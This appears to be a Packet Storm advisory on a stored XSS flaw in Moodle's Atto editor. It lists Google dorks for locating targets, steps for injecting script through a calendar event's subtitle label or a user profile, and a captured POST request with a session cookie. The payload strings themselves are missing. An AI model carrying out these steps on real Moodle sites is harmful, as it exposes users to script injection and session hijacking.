Moodle Atto Editor Cross Site Scripting ≈ Packet Storm
# Date: 26.03.2021
# Author: Vincent666 ibn Winnie
# Software Link: https://moodle.org/plugins/editor_atto
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Google Dorks: inurl:/lib/editor/atto/plugins/managefiles/ or
calendar/view.php?view=month
# My Youtube Channel: https://www.youtube.com/channel/UCZOWpC2dW9sipPq5z63C2rQ
PoC:
Video PoC: (Update)
https://www.youtube.com/watch?v=vnyo48KImvg
https://www.youtube.com/watch?v=fUWGRqT7lDU
Stored XSS in Atto Editor (default editor)
Use Demo:
https://school.moodledemo.net/
Choose a role : Student (example)
Open calendar :
https://school.moodledemo.net/calendar/view.php?view=month
Create new event:
Example:
Event Title “Test”
Description :Choose Insert Video File and choose Video:
Video Source Url you can paste video link from youtube
And open Subtitles and Captions:
Subtitle track URL use video link from youtube
Field Label : There is we can use xss code:
or try in base64
Insert Media and save this.
Open event and get stored xss.
Or we can use Profile:
https://sandbox.moodledemo.net/user/edit.php?id=4&returnto=profile
Field Label in the Editor vulnerable to XSS.
We can use XSS and js redirect in the profile:
“>
POST:
https://school.moodledemo.net/lib/ajax/service.php?sesskey=vCHlHS7oIl&info=core_calendar_submit_create_update_form
Host: school.moodledemo.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 996
Origin: https://school.moodledemo.net
Connection: keep-alive
Referer: https://school.moodledemo.net/calendar/view.php?view=month
Cookie: MoodleSession=4ea0036558425526decc096ed375b886;
EU_COOKIE_LAW_CONSENT=true
Comments